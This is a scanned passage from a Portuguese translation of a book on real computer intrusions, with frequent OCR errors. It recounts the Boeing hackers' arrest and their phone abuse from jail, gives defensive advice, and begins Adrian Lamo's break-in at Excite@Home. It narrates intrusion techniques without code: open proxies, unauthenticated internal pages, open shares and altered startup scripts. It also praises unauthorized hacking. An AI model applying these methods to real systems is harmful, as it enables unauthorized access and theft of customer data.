Mais tarde, Don descobriu que a noticia tinha vazado por causa de um funcionario da Boeing que estava 
descontente com a decisao de vigiar as atividades de Matt e Costa, em vez de prende-los imediatamente. Don 
correu para seu escritório e ligou para todos os envolvidos, "Eu disse: 'Vejam, toda essa coisa vazou! Esta nos 
noticiarios! Temos de fazer alguma coisa agora!". "Howard Schmidt, especialista em redigir mandados de busca e 
apreensao de computadores, estava la e ajudou-os a faze-los corretamente — logo, nao havia duvida em relaęao a 
isso." 

Na realidade, Don nao estava aborrecido demais com a dmdgaęao da informaęao. "Estavamos muito perto de 
pega-los, de qualquer modo. Tinhamos muitas evidencias sobre as aęoes deles." Mas suspeitou de que houvesse 
ainda mais coisa que nao tinha sido descoberta. "Imaginamos que eles estivessem envolvidos em outras coisas, 
como fraude de cartao de credito. Mais tarde, foram pegos por isso. Acho que demorou seis meses ou um ano 
para o Servięo Secreto pega-los." 

Presos 

Costa sabia que logo seria preso, e nao ficou surpreso com as fortes batidas a porta de seu apartamento. 
Aquela altura, ele ja tinha se livrado de quatro cadernos cheios de evidencias incriminatórias e nao tinha como 
saber que, graęas a Don Boelling, os agentes federais dispunham de todas as evidencias de que precisavam para 
condenar ele e Matt, 

Matt lembra-se de ter visto urna reportagem sobre urna invasao de computadores na Boeing pela televisao, na 
casa de seus pais. Por volta de dez da noite, bateram a porta. Eram dois agentes do FBE Eles o interrogaram na 
sala de jantar durante cerca de duas horas, enquanto os pais dele dormiam no andar de cima. Matt nao quis 
acorda-los. Ele estava com medo de fazer isso. 

Don Boelling teria ido junto prende-los, se pudesse. Apesar de todos os seus bons contatos, ele nao foi 
convidado. "Eles nao gostavam muito de levar civis para dar a batida." 

A Boeing ficou preocupada em saber que o nome de um dos hackers era o mesmo nome de um funcionario. 
Matt nao gostou de ver seu pai no meio da confusao. "Como meu pai trabalhava na Boeing e tinhamos o mesmo 
nome, ele foi interrogado." Costa logo ressaltou que eles haviam tornado o cuidado de nao acessar a Boeing com 
qualquer informaęao que o pai de Matt pudesse ter. "Ele deixou seu pai totalmente de fora. Desde o inicio nao 
quis envolve-lo, mesmo antes de pensarmos que poderiamos nos meter em encrenca." 

Don sentiu-se um pouco incomodado quando o agente especial encarregado do escritório do FBI em Seattle 
foi entrevistado depois que o caso foi descoberto. Um dos repórteres da TV perguntou como eles tinham rastreado 
e pego os hackers. O agente respondeu algo como: "O FBI usou procedimentos e tecnicas complicados demais 
para serem discutidos aqui". Don pensou consigo: "Seu merda! Voce nao fez nada! Fomos nos que fizemos!". 
Todo um grupo coordenado tinha sido envolvido, pessoas da Boeing, de outras empresas, do Forum Distrital e da 
agencia local, da estadual e da federal da policia. "Foi a primeira vez que fizemos urna coisa dessas. Foi um 
esforęo de equipe." 
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Felizmente, Matt e Costa tinham causado poucos danos, considerando o caos que poderiam ter 
provocado, "Eles realmente nao fizeram tanta coisa que prejudicasse de fato a Boeing", reconheceu Don. A 
empresa saiu facilmente da situaęao, mas quis certificar-se de que a lięao tinha sido apreendida. "Eles 
foram declarados culpados basicamente porque nos os flagramos. Nao havia como se safarem dessa", 
lembra Don com satisfaęao. 

Mas, novamente, as penas foram reduzidas, e dessa vez varias acusaęoes por crime passaram a 
Violaęao de computador'. Os dois pegaram outra punięao leve: 250 horas de servięo comunitario e cinco 
anos de liberdade yigiada sem a permissao de usar computadores. A parte dura foi a restituięao: eles 
tiveram de pagar 30 mil dólares, a maior parte para a Boeing. Embora nenhum deles fosse menor, os 
rapazes tiveram outra oportunidade. 

A sorte acabou 

Eles nao aprenderam a lięao. 

Costa: Devlamos ter parado de uma vez. Eramos garotos tolos, ou melhor, nao tolos, mas 
ingenuos, a ponto de nao percebermos o tamanho do problema no qual estavamos nos 
envolvendo. Nao foi realmente ganancia, foi mais o glamour de dispor de um telefone celular e 
usa-lo ąuando ąuisesse. 

Matt: Naąuela epoca isso era uma grandę coisa. Era muito chiąue ter um celular. 

Mas a sorte que Matt e Costa estavam tendo com o sistema judiciario criminal estava prestes a 
terminar. E a causa nao seria algo previsivel, mas, antes de tudo, ciume. 

Costa diz que sua namorada, na epoca, achava que ele estava enganando-a com outra mulher. Mas nao 
era isso, diz Costa; a outra era "apenas uma amiga, nada mais". Costa supóe que, quando a namorada soube 
que ele nao parou de ver a 'amiga', ligou para as autoridades policiais e contou que os hackers da Boeing 
estavam vendendo computadores roubados. 

Quando os investigadores chegaram na casa de sua mae, Costa nao estava la, mas ela estava. "Ah, sim, 
entrem", disse, certa de que nao haveria nenhum mai nisso. 

Eles nao encontraram nenhuma mercadoria roubada. Essa foi a boa noticia. A ma noticia foi que 
acharam um pedaęo de papel caido no chao que tinha ficado embaixo do tapete. Nele havia Um numero de 
telefone e alguns digitos que um investigador reconheceu como sendo um numero eletrónico serial. Uma 
checagem com a companhia telefónica revelou que as informaęoes estavam associadas a uma conta de 
telefone celular usada ilegalmente. 

Costa soube da batida na casa da mae dele e decidiu sumir. 

Eu estava sendo procurado pelo Servięo Secreto ha cinco dias — eles tinham jurisdięao sobre 
fraude de telefone celular e eu era um fugitivo. Entao, estava no apartamento de um amigo em 
Seattle e eles foram ate la procurar por mim, mas o carro que eu dirigia ainda estava em nome 
do proprietario anterior, por isso nao fui pego. 
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No quinto ou sexto dia, conversei com meu advogado, fui ao escritório do Departamento de Liberdade 
Vigiada com ele e me entreguei. Fui preso e levado embora. Fugir do Seryięo Secreto — aquele foi um 
periodo estressante. 

Matt tambem foi pego. Os dois ficaram em andares separados na cadeia de King County, de Seattle. 

Phreaking de cadeia 

Dessa vez, os meninos ficaram sabendo que nao haveria julgamento. Concluida a investigaęao e reunidas as 
provas pela promotoria, os dois se apresentariam perante o juiz por terem desrespeitado a liberdade vigiada. Sem 
julgamento, sem chance de defesa e sem muita esperanęa de indulgencia. 

Enąuanto isso, cada um deles seria minuciosamente interrogado. Os policiais conheciam o esąuema: manter os 
hackers separados e confundi-los ąuando contassem histórias diferentes. 

Matt e Costa descobriram que a cadeia, pelo menos para eles, era um lugar piór que a prisao para cumprir pena. 
"A cadeia do condado era a piór de todas. Fui ameaęado por algumas pessoas", diz Costa. "Eu me meti numa briga. 
Se voce nao revida, acabam com voce." Matt lembra-se de ter levado um soco de alguem. "Acho que foi porque eu 
nao saia do telefone. Entao, aprendi a lięao." 

A cadeia era dificil em outro sentido. Costa recorda: 

Por nao saber o que viria depois, porque ja tinhamos nos envolvido em encrenca e sabiamos que 
teriamos mais problemas. Era medo do desconhecido mais do que dos detentos. Eles só disseram 
"Prendam-nos", e nao havia flanęa nem acordo. Era uma cadeia federal. Nao tinhamos ideia de para 
onde iriamos e licamos presos por muito tempo. 

As cadeias geralmente tern dois tipos de telefones: os pagos, em que as conversas sao monitoradas para se ter 
certeza de que os detentos nao estao tramando nada ilegal, e os que se conectam diretamente ao Departamento de 
Defesa Publica, para que os detentos possam conversar com seus advogados. 

Na cadeia de Seattle, as ligaęoes para o Departamento de Defesa Publica sao feitas a partir de uma lista de 
códigos de dois digitos. Matt explicou: "Mas se voce liga depois do expediente, o que consegue? Voce entra no 
sistema de secretaria eletrónica e pode introduzir tantos tons de discagem quanto quiser". Eles comeęaram a 
explorar o sistema de secretaria eletrónica. 

Matt conseguiu identificar o sistema como Meridian, um tipo que ele e Costa conheciam, e programou-o para 
transferir suas ligaęoes para uma linha extema, "Configurei um menu numero oito, em que o anuncio automatico da 
voz nao era iniciado. Entao eu podia discar um numero local e um código de seis digitos que conhecia. De la eu 
podia ligar para qualquer lugar do mundo." 

Embora os telefones fossem desligados as oito da noite, a linha do departamento ficava sempre ligada. 
"Usavamos os telefones a noite toda e nao havia ninguem esperando para usa-los porque eles pensavam que 
estavam desligados", diz Costa. "Eles acreditavam que voce estava louco, sentado la, falando ao telefone. Entao, 
fimcionou perfeitamente." 


> 
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Enąuanto Costa tentava descobrir como fazer ligaęoes extemas, Matt tambem usava o telefone em sua unidade 
a noite para fazer algumas exploraęóes por conta própria. Ele localizou um "numero ponte em um velho roteador" 
de urna companhia telefónica da Pensilvania, o que permitia que cada um deles ligasse de um numero de teste da 
companhia telefónica e conversassem, 

Os dois passavam horas nos telefones nao monitorados conversando. "Conseguimos discutir nosso caso antes 
dos interrogatórios. Aquilo foi pratico, realmente pratico", diz Costa. Matt acrescentou: "Discutiamos sempre o que 
estava sendo dito para o outro lado, Queriamos ter tudo confirmado", 

Os detentos descobriram que os dois garotos eram especialistas em telefonia. 

Costa: Eu estava engordando la, porąue os outros me davam suas bandejas em troca de ligaęoes 
telefónicas gratuitas. 

Matt: Eu estava comeęando a emagrecer de tanto nervoso. Sentava la com todos aqueles ladroes e 
assassinos e nao gostava de fazer todas aquelas ligaęoes para eles. 

Estar na cadeia e transgredir a lei fazendo ligaęoes telefónicas ilegais e planejando depoimentos na esperanęa 
de enganar os promotores. Para qualquer hacker, isso e bem engraęado. Para Matt e Costa, significava arriscar-se a 
sofrer mais acusaęóes alem daquelas que ja enfrentavam. 

No finał, seus esforęos de cooperaęao secreta nao ajudaram. Os fatos estavam contra eles, e dessa vez 
encontravam-se na frente de um juiz que nao ia lhes dar urna punięao leve. Cada um deles foi condenado a cumprir 
"um ano e um dia" numa instalaęao federal, com credito do tempo ja cumprido na cadeia do condado. O dia 'extra' 
do tempo de prisao foi um grandę beneficio para eles. Sob as leis federais, aquilo fez com que tivessem a 
possibilidade de ser soltos ate 54 dias antes por bom comportamento. 

Os dois foram mantidos presos sem acordo de fianęa durante tres meses e meio e depois foram soltos, 
assumindo o compromisso de se apresentarem perante a corte, sob muitas restrięóes, ate que o juiz decidisse a 
sentenęa. Don estava certo: nada de indulgencia dessa vez. 

Cumprindo pena 

Matt foi enviado para o Sheridan Camp, em Oregon, enquanto Costa foi para a Boroń Federal Prison Camp, na 
Califómia. "Era federal porque violamos nossas condięóes de sursis numa acusaęao federal", diz Costa. 

No entanto, esse nao foi exatamente um 'periodo d i f i c i 1' para nenhum deles. Costa: 

Eu sabia que tinha regalias. Essa era uma detenęao que tinha uma piscina. No melo do Mojave, isso 
era bom. Nao havia cerca em volta, só uma linha amarela na areia. Era um desses lugares que, sabe 
como e, tinha tres senadores. Junto comigo estava o cara que tinha comeęado uma famosa cadeia de 
restaurantes. 

Boroń era a ultima instituięao federal com piscina, e Costa soube mais tarde que uma reportagem de Barbara 
Walters na televisao resultou na interdięao da piscina logo depois que ele foi solto. 
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Pessoalmente, posso entender por que nao gastar o dinheiro do contribuinte numa piscina ąuando uma nova prisao 
esta sendo construida, mas nao consigo entender por que destruir uma que ja existe. 

Na prisao de Sheridan, Matt descobriu que outro detento foi executivo da Boeing. "Ele ficou encrencado por 
algum tipo de 'maquiagem' ou crime de colarinbo-branco." Parecia um pouco irónico. 

Costa e os outros detentos de Boroń frequentemente eram conduzidos por meia hora pelo deserto, num ónibus 
do presidio que soltava uma fumaęa pręta, para fazer trabalho braęal na Edwards Air Force Base. "Eles me 
colocavam num hangar do exercito onde havia um servidor VAX. Eu nem podia chegar perto de um computador." 
Ele alertou o sargento. "Eu lhe contei minha historia e ele se interessou: Ah, continua'." Costa nao perdeu tempo 
em conhecer o computador militar "Eu estava entrando no IRC todos os dias e conversava enquanto estava preso. 
Eu fazia download rapido do Doom. Era espantoso, genial!" 

Certa vez, Costa foi encarregado de esvaziar uma van de espionagem cheia de equipamentos eletrónicos 
delicados. "Nao pude acreditar que eles estavam me deixando fazer aquilo." 

Em certo sentido, o tempo deles na prisao parece uma aventura, quase uma piada. Mas nao era. Cada mes que 
eles passavam la dentro era um mes de vida perdido, um mes de estudos perdido, um mes longe de pessoas de quem 
eles gostavam e com quem queriam estar. Toda manha um prisioneiro comeęa seu dia desejando saber se tera de 
brigar para defender a si próprio ou o que e seu. A cadeia e o confmamento podem ser aterrorizantes. 

O que eles estao fazendo hoje 

Dez anos depois de serem soltos, ambos parecem sossegados, levando um estilo de vida mais comum, Matt 
atualmente trabalha para uma grandę empresa em San Jose como projetista de aplicativos Java. Costa tern sua 
própria empresa e parece bastante ocupado "instalando sistemas de vigilancia digital e distribuindo audio clients 
(slimdevices) para empresas". Ele descobriu a atividade certa para exercer "As pessoas que ficam entediadas com 
seu trabalho sentiriam inveja de mim", diz ele, que "aproveita cada minuto". 


Insight 

Parece espantoso, no mundo de hoje, os hackers ainda acharem tao facil entrar em sites Web de tantas 
organizaęoes. Com todas as histórias de invasoes, com toda a preocupaęao com a seguranęa, com pessoal dedicado, 
profissionais na equipe ou consultoria disponivel a grandes e pequenas empresas, e espantoso que esses dois 
adolescentes tenham sido suficientemente habeis para descobrir um modo de entrar nos computadores de um 
tribunal federal, de uma importante cadeia de hoteis e da Boeing Aircraft. 

Isso acontece, em parte, acredito, porque muitos hackers seguem o caminho que segui, dedicando um tempo 
fora do comum ao aprendizado de sistemas de computador, software de sistema operacional, programas de 
aplicativos, networking e coisas do tipo. Eles sao, na maioria, autodidatas, 
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mas em parte tambem sao orientados por uma rede informal, mas altamente efetiva, de tutoria, na qual "os 
conhecimentos sao compartilhados". Alguns que mai salram do ensino fundamental dedicaram tempo e adquiriram 
conhecimentos suficientes na area para se qualificar a um diploma de bacharel em ciencias em hacking. Se o MIT 
ou o Cal Tech concedessem um diploma desses, conheęo alguns que indicaria para fazer os exames de graduaęao* 

Nao causa admiraęao que tantos consultores na area de seguranęa tenham um passado secreto como hacker 
black hat* (inclusive mais do que esses cujas histórias sao contadas nestas paginas). Comprometer sistemas de 
seguranęa requer determinado tipo de mentalidade analitica capaz de fazer a seguranęa falhar. Qualquer um que 
tente entrar na area tendo como bagagem apenas o aprendizado de sala de aula precisaria ainda de muita 
experiencia pratica, uma vez que estaria competindo com consultores que comeęaram sua aprendizagem aos 8 ou 
10 anos de idade. 

Pode ser dificil admitir, mas a verdade e que todos na area de seguranęa tern muito a aprender com os hackers, 
que podem revelar vulnerabilidades no sistema complicadas de reconhecer e onerosas de resolver. Eles podem 
transgredir o processo da lei, mas desempenham um papel importante, de fato, muitos 'profissionais' de seguranęa 
foram hackers no passado. 

Alguns lerao isso e dirao que Kevin Mitnick, que foi hacker, esta simplesmente defendendo a geraęao atual de 
hackers, Mas a verdade e que muitos ataques de hacker servem ao valioso propósito de expor vulnerabilidades na 
seguranęa de uma empresa. Se o hacker nao causou danos, nao come-teu roubo nem derrubou nenhum servięo, a 
empresa sofreu ou se beneficiou com o ataque ao ter de enfrentar suas vulnerabilidades? 

Medidas preventivas 

Assegurar a gestao adequada da configuraęao e um processo crucial, que nao deveria ser ignorado. Mesmo que 
voce configure adequadamente todo o hardware e o software na ocasiao da instalaęao e mantenha atualizaęoes de 
todos os patches essenciais de seguranęa, configurar inadequadamente um unico item pode criar um ambiente 
vulneravel. Toda organizaęao deveria adotar um procedimento padrao para garantir que o pessoal de TI, que instala 
um novo hardware e software de computador, e o pessoal das telecomunicaęoes, que instala servięos de telefonia, 
sejam bem treinados e lembrados regularmente — se nao testados — de verificar se a seguranęa faz parte de seu 
pensamento e comportamento, 

Com o risco de parecer que estamos promovendo nosso livro anterior, A arte de enganar, lembra-mos que ele 
oferece um piano de treinamento para o fimcionario no que diz respeito a seguranęa do computador. Sistemas e 
dispositivos devem ser testados para verificar se sao seguros antes de serem colocados em produęao, 

Acredito piamente que contar apenas com senhas estaticas deve ser uma pratica do passado. Uma medida mais 
solida de seguranęa, o uso de algum tipo de dispositivo, como o token (assinatura digital em tempo real), ou um 
dispositivo biometrico confiavel (senha baseada na impressao digital), deveria ser acompanhado de uma senha 
pessoal — mudada freąuentemente — para proteger sistemas que processam e armazenam informaęoes valiosas. 
Usar um modo mais seguro de autenticaęao 


* Sao hackers que invadem, danificam, alteram e furtam informaęoes em beneficio próprio (N, da R. T.). 
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nao garante que o sistema nao possa ser atacado por hackers, mas pelo menos aumenta a dificuldade. 

As organizaęoes que continuam a usar apenas senhas estaticas precisam fornecer treinamento e lembretes 
ou incentivos frequentes para encorajar praticas seguras de senha. A politica efetiva de senha exige que os 
usuarios utilizem senhas seguras com pelo menos urn numerai e urn simbolo ou letras maiusculas e minusculas e 
que elas sejam alteradas periodicamente. 

Outra etapa requer certificar-se de que os funcionarios nao terao dificuldade em memorizar a senha, 
anotando-a e colocando-a em seu monitor ou escondendo-a embaixo do teclado ou numa gaveta da mesa de 
trabalho — lugares onde qualquer ladrao de dados experiente sabe que deve procurar primeiro. A boa pratica de 
senha tambem requer que nunca se use a mesma senha ou senhas parecidas em mais de urn sistema. 

O resultado 

Vamos acordar, pessoal! Mudar as contiguraęoes-padrao e usar senhas seguras podem evitar que a sua 
empresa seja vitima de hackers. 

Mas isso nao e apenas falta de cuidado do usuario. Os fabricantes de software nao tern dado tanta prioridade 
a seguranęa como dao a interoperabilidade e a funcionalidade. Sem duvida, eles oferecem orientaęoes 
cuidadosas nos guias do usuario e nas instruęoes para instalaęao. Ha urn velho ditado de engenharia que diz: 
"Ouando tudo falhar, leia as instruęoes". Obviamente, voce nao precisa de urn diploma de engenharia para seguir 
essa regra desaconselhavel. 

E hora de os fabricantes comeęarem a ficar alerta a esse eterno problema. Que tal eles comeęarem a 
reconhecer que a maioria das pessoas nao le a documentaęao? E que tal incluir urna mensagem de advertencia 
que sugira ativar a seguranęa ou mudar os padróes de seguranęa que aparecem quando o usuario esta instalando 
o produto? Ainda melhor, que tal fabrica-lo de modo que a seguranęa seja ativada como padrao? A Microsoft fez 
isso recentemente — mas só no finał de 2004, no upgrade de seguranęa para as edięoes do Windows XP 
Professional e Home, com o lanęamento de seu "Service Pack 2", em que o firewall embutido e ativado como 
padrao. Por que demorou tanto? 

A Microsoft e outros fabricantes de sistemas operacionais deveriam ter pensado nisso anos atras. Urna 
mudanęa simples como essa em toda a industria poderia tornar o ciberespaęo urn pouco mais seguro para todos 
nos. 
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O hacker Hobin Hood 


[Hacking] para mim sempre teve menos a ver com tecnologia e mais com 
religiao. 

Adrian Lamo 


O hacking e uma habilidade. Qualquer um pode aprender sozinho e adquiri-la. Na minha opiniao, hacking e uma 
arte criativa — um modo de imaginar maneiras inteligentes de driblar a seguranęa. E como aquelas pessoas que 
adoram ficar tentando descobrir segredos de cofres por puro entretenimento. As pessoas poderiam fazer hack sem 
violar a lei. 

A diferenęa e que o proprietario permite ao hacker que ele se infiltre em seus sistemas de computador. Ha muitos 
modos de fazer hack, mas com permissao da 'vitima\ Alguns transgridem a lei cientes disso, mas nunca sao pegos. 
Outros correm o risco e cumprem pena na prisao. Praticamente todos ocultam a identidade atras de um 'nickname' — 
a versao on-line de apelido. 

Mas ha algumas pessoas, como Adrian Lamo, que fazem hack sem esconder a identidade e, quando encontram 
uma falha na seguranęa de alguma organizaęao, avisam-na sobre isso. Esses sao os Robin Hoods do hacking. Eles 
nao deveriam ser encarcerados, mas exaltados. Ajudam as empresas a se manterem alertas antes que um hacker 
malicioso cause algum dano serio a elas. 

A lista de organizaęoes que o govemo federal diz que Adrian Lamo invadiu e, para dizer o minimo, 
impressionante. Inclui a Microsoft, a Yahoo!, a MCI WorldCom, a Excite@Home e as empresas de telefonia SBC, 
Ameritech e Cingular. 1 E o veneravel New York Times. 

Tudo bem, Adrian tern um custo monetario para as empresas, mas nem de longe o tanto que os promotores 
afirmaram. 
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Resgate 

Adrian Lamo nao era um adolescente tipico, daąueles que gostam de ficar 'andando no shopping'. Uma 
noite, bem tarde, por exemplo, ele e os amigos estavam explorando um grandę complexo industrial 
abandonado, localizado a margem do rio- Sem ter nenhum propósito particular em mente, andaram por uma 
vasta fabrica, em ruinas, e logo se perderam. Eram cerca de duas da manha ąuando encontraram a saida do 
labirinto. Ao atravessarem a linha ferrea desativada, cheia de sucatas de maąuinario industrial enferrujado, 
Adrian ouviu uma especie de choro fraco, Embora seus amigos só ąuisessem sair de la, a curiosidade de 
Adrian foi aguęada. 

Ao seguir o som tristonho, ele foi desembocar num bueiro sujo. A luz ffaca era suficiente para ver os 
cantos escuros, onde um gatinho estava preso no fundo, miando o mais alto que podia. 

Adrian ligou para o auxilio a lista de seu celular e pediu o numero do Departamento de Policia. Logo 
depois, o farolete de um policial da patrulha cegou o grupo. 

Eles estavam yestidos com o que Adrian descreve como "aparato de exploraęao urbana — luvas e 
macacoes sujos. Nao o tipo de roupa que inspira confianęa e benevolencia nas autoridades da lei**. Adrian 
tambem acredita que, para um adolescente, ele parecia um pouco suspeito, e "podiamos ou nao ter feito 
coisas que levassem a prisao", diz ele. Varias ideias passaram pela cabeęa de Adrian. Eles podiam nos fazer 
uma serie de perguntas e possivelmente nos prender, ou poderiamos fugir ou... um piano lhe veio a cabeęa. 

Eu acenei para eles e disse: M Ei, ha um gatinho aqui no bueiro. Poderiam me ajudar?". Duas 

horas mais tarde, nenhum de nos tinha sido procurado — e as circunstancias suspeitas foram 

esąuecidas. 

Depois de chegarem duas patrulhas e um veiculo de controle animal, o gato imundo foi erguido com 
seguranęa em uma rede. O policial deu o gatinho a Adrian, que o levou para casa, o lavou e o chamou de 
Alibi'. Os amigos dele o chamaram de 'Drano'. 

Mais tarde, Adrian refletiu sobre o encontro. Como e o tipo de pessoa que nao acredita em coincidencia, 
esta certo de que todos eles estavam exatamente onde deveriam estar naquele momento. Ele ve suas 
experiencias com computador da mesma maneira, como "quase transcendentais": nao existe nada por acaso. 

E interessante que Adrian tambem faz uma analogia entre a dificil experiencia do gatinho e o que os 
hackers fazem. Palavras como 'adaptar', 'improviso' e 'intuięao' vem a mente todas como elementos 
fundamentais de negociaęao bem-sucedida para as varias armadilhas e impasses ocultos nas pequenas ruas e 
becos da rede. 


Raizes 

Nascido em Boston, Adrian morou a maior parte da infancia em New England antes de sua familia 
instalar-se em Washington, de. Seu pai, um colombiano, escreve histórias infantis e faz traduęoes de 
espanhol e ingles. Adrian considera-o um filósofo nato. Sua mae lecionava ingles, mas agora cuida da casa. 
"Eles costumayam me levar a comicios politicos quando eu era crianęa. Eles 
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me criaram ensinando-me a ąuestionar o que vejo a minha volta e se esforęaram para ampliar meu horizonte." 

Adrian nao acha que ele se encaixe num perfil demografico, embora acredite que a maioria dos hackers pertence 
ao que chama de "classe media branca". Certa vez, tive a honra de conhecer os pais dele. Eles me contaram que urna 
das razoes para o filho ter se envolvido em hacking foi a inspiraęao que varios hackers lhe causaram. Nao foi 
mencionado nada, mas Adrian me da a impressao de que um desses individuos poderia ter sido eu. Os pais dele 
provavelmente gostariam de torcer meu pescoęo. 

Aos sete anos, Adrian comeęou a mexer no computador de seu pai, um Commodore 64. Um dia, ele ficou 
frustrado com um jogo de aventura que estava tentando jogar. Toda saida parecia levar a um impasse, Ele descobriu 
que, enquanto carregava um pro grama no computador e antes de executar o comando "run", havia urna maneira de 
instruir o computador para gerar urna lista de código-fonte do jogo. A lista revelou as respostas que estava 
procurando e ele ganhou o jogo imediatamente. 

Sabe-se bem que, quanto mais cedo urna crianęa comeęa a aprender urna lingua estrangeira, com mais facilidade 
ela a assimila. Adrian acha que o mesmo acontece quando se comeęa a lidar mais cedo com o computador. Ele tern 
urna teoria: talvez o cerebro ainda nao tenha se tornado 'hardwired'. a rede neural ainda seja mais maleavel, mais 
rapida para adquirir e guardar conhecimentos do que na fasę adulta. 

Adrian cresceu imerso no universo dos computadores. Via-os como urna extensao da realidade e, portanto, 
prontos a serem manipulados. Para ele, um computador nao era algo para ler ou aprender a mexer consultando longos 
manuais. Nao era um dispositivo extemo, como um refrigerador ou um carro, mas urna janela — para si mesmo. Ele 
chegou a conclusao de que processava informaęoes organicamente, da maneira que um computador e seus programas 
intemos fazem. 

Reunioes a meia-noite 

Dos sistemas de computador corporativos que Adrian invadiu, ele considera o Excite@Home sua maior 
experiencia de 'espionagem'. A aventura comeęou num impulso, quando alguem sugeriu que ele verificasse o site 
@Home. Do mesmo modo que a 'central' de todos os servięos a cabo de Internet nos Estados Unidos, Adrian tinha 
certeza de que ele estava bem protegido e nao valeria a pena perder seu tempo. Mas, se pudesse invadi-lo com 
sucesso, teria acesso a informaę6es-chave sobre todo usuario de cabo no pais. 

Os hackers estao descobrindo hoje em dia que o Google pode ser surpreendentemente util para descobrir 
provaveis alvos de ataque e revelar informaęoes relevantes. Adrian inicia muitas de suas incursoes de hacking 
pesquisando um conjunto de palavras-chave que frequentemente leva a sites com alguma falha em sua configuraęao. 

Entao, ele ligou seu laptop em um ponto de rede publico, numa classe de urna universidade da Filadelfia, e 
carregou a pagina da Excite@Home. A sala de aula era um ambiente familiar para ele: qualquer local usado por 
muitas pessoas, ou urna lan house, ou um ponto de acesso aberto, sem fio, que fique on-line, e urna maneira facil e 
efetiva de um hacker encobrir o local de onde esta agindo. Descobrir a verdadeira identidade de alguem que usa 
aleatoriamente pontos publicos de acesso a Internet e extremamente dificil. 
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O modo como Adrian pensa ajuda a entender o processo mental da pessoa que projetou o programa ou a rede que 
esta atacando, usando seu conhecimento dos padroes e praticas-padrao que os arquitetos de rede frequentemente 
usam como suporte inicial. Ele gosta de explorar servidores proxy mai configurados — sistemas de computador que 
servem de intermediarios entre a rede in-tema e redes 'nao-confiaveis\ como a Internet. O proxy examina cada 
pedido de conexao de acordo com as regras que recebeu. Quando um administrador de rede faz urna configuraęao 
malfeita de servidores proxy da empresa, qualquer um que se conecte ao proxy pode 'atravessar o tunel' da rede 
interna supostamente segura da empresa. 

Para um hacker, um proxy aberto e um convite a confusao, porque ele lhe permite avaliar como se estivesse 
fazendo solicitaęoes, como qualquer funcionario da empresa: de dentro da própria rede da empresa. 

Na classe da universidade, Adrian descobriu um proxy mai configurado que abriu a porta para as paginas intemas 
da rede de varios departamentos da Excite@Home. Na seęao "Ajuda" de um, ele fez urna pergunta sobre problemas 
para fazer a conexao. Na resposta veio o endereęo URL de urna pequena parte do sistema que auxiliava na resoluęao 
de problemas de TI. Ao analisar esse URL, ele conseguiu acessar divisoes da empresa que usavam a mesma 
tecnologia. Nao lhe pediram autenticaęao: o sistema tinha sido projetado supondo-se que qualquer um que soubesse 
solicitar endereęos para essas partes do site Web deveria ser um funcionario ou outra pessoa autorizada — urna 
premissa incerta tao dmdgada que ganhou um apelido: seguranęa pela obscuridade. 

A etapa seguinte foi visitar um site conhecido entre os exploradores do ciberespaęo, o Netcraft. com. Adrian 
introduziu aleatoriamente nomes de dominio parciał, enquanto o Netcraft retomou urna lista de servidores da 
Excite@Home, mostrando as maquinas Solaris que rodavam os servidores 
Apache. 

A medida que explorava, Adrian descobriu que o centro de operaęoes da rede da empresa oferecia um sistema de 
suporte tecnico que permitia que funcionarios autorizados tivessem acesso a detalhes sobre clientes que solicitassem 
assistencia — "Socorro! Nao consigo acessar minha conta", ou algo do tipo. O funcionario as vezes pedia ao cliente 
que fornecesse nome e senha — o que era seguro o suficiente, porque tudo isso estava atras do firewall da empresa; 
as informaęoes seriam inseridas na descrięao do problema. 

O que Adrian descobriu, diz ele, foi de 'arregalar os olhos'. Os 'tesouros' incluiam informaęoes de login e senhas 
de clientes, detalhes sobre o processo de conduęao de problemas e reclamaęoes de usuarios intemos em relaęao a 
dificuldades que estavam enfrentando com o computador, Ele tambem descobriu um script para gerar um 'cookie de 
autenticaęao* que permitiria a um tecnico, como a qualquer portador de conta, fazer a autenticaęao para resolver um 
problema sem exigir a senha do cliente. 

Um memorando sobre um problema chamou a atenęao de Adrian. Tratava-se do caso de um cliente que ha mais 
de um ano tinha pedido ajuda com referencia a informaęoes pessoais, incluindo numeros de cartao de credito, 
roubados por alguem num servięo Internet Relay Chat. O memorando interno dizia que os 'tecnicos' concluiram que o 
problema nao era deles e nao se deram ao trabalho de responder. Eles basicamente se livraram do pobre coitado. 
Adrian ligou para o homem em casa, fazendo-se passar por um tecnico da empresa, e disse: "Na verdade nao estou 
incumbido de resolver esse problema, mas fiquei curioso para saber se o senhor recebeu alguma resposta nossa". 
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O homem disse que nunca tinha recebido uma unica palavra em resposta. Adrian imediatamente lhe deu a 
resposta correta e roda a documentaęao e discussao interna a respeito de seu problema ainda pendente, 

Eu tive uma sensaęao de satisfaęao, porąue ąuero acreditar num universo onde algo tao 
improvavel ąuanto ter seu banco de dados roubado por alguem no Internet Relay Chat possa 
ser explicado um ano depois por um invasor que tenha comprometido a empresa que voce 
achou que o ajudaria. 

Naąuele momento, o proxy aberto que tinha lhe permitido acesso parou de funcionar* Ele nao sabia bem 
por que, mas nao podia mais entrar. Comeęou a tentar de outro modo. A abordagem usada foi, nas palavras 
dele, 'totalmente nova'. 

O primeiro passo foi fazer o que e chamado reverse lookup do DNS — usar um endereęo 1P para 
descobrir o nome correspondente do host. (Se voce entra com uma solicitaęao em seu browser para ir do site 
para www.defensivethinking.com , a solicitaęao vai para um Servidor de Nome de Dominio (DNS), que 
traduz o nome em um endereęo que pode ser usado na Internet para seguir sua solicitaęao, nesse caso, 
209.151.246.5. A tatica que Adrian estava usando inyerte o processo: o atacante entra com um endereęo IP e 
e fomecido o nome de dominio do dispositivo a que o endereęo pertence.) 

Ele tinha de passar por muitos endereęos, e a maioria deles nao oferecia nada de interessante. No entanto, 
descobriu um com o nome dialupOO.corp.home.net e varios outros que tambem comeęavam com 'dialup'. 
Supós que esses hosts fossem usados por funcionarios que estivessem na rua para discar para a rede da 
empresa. 

Logo descobriu que esses numeros de discagem estavam sendo usados por funcionarios que ainda 
Trabalhavam com computadores que tinham vers5es mais antigas do sistema operacional — yersoes tao 
antigas quanto o Windows 98. E varios dos usuarios do dial-up tinham shares abertos, que permitiam o 
acesso remoto a certos diretórios ou que ele entrasse no disco rigido sem ler nem escrever a senha. Adrian 
percebeu que podia fazer mudanęas nos Scripts para iniciar o sistema operacional, copiando arquivos para os 
shares, de modo que eles pudessem executar os comandos que escolhesse. Depois de escrever sua própria 
yersao de determinados arquivos de inicializaęao, ele sabia que primeiro teria de esperar ate que o sistema 
fosse reiniciado para que depois seus comandos fossem executados. Mas Adrian sabia ser paciente. 

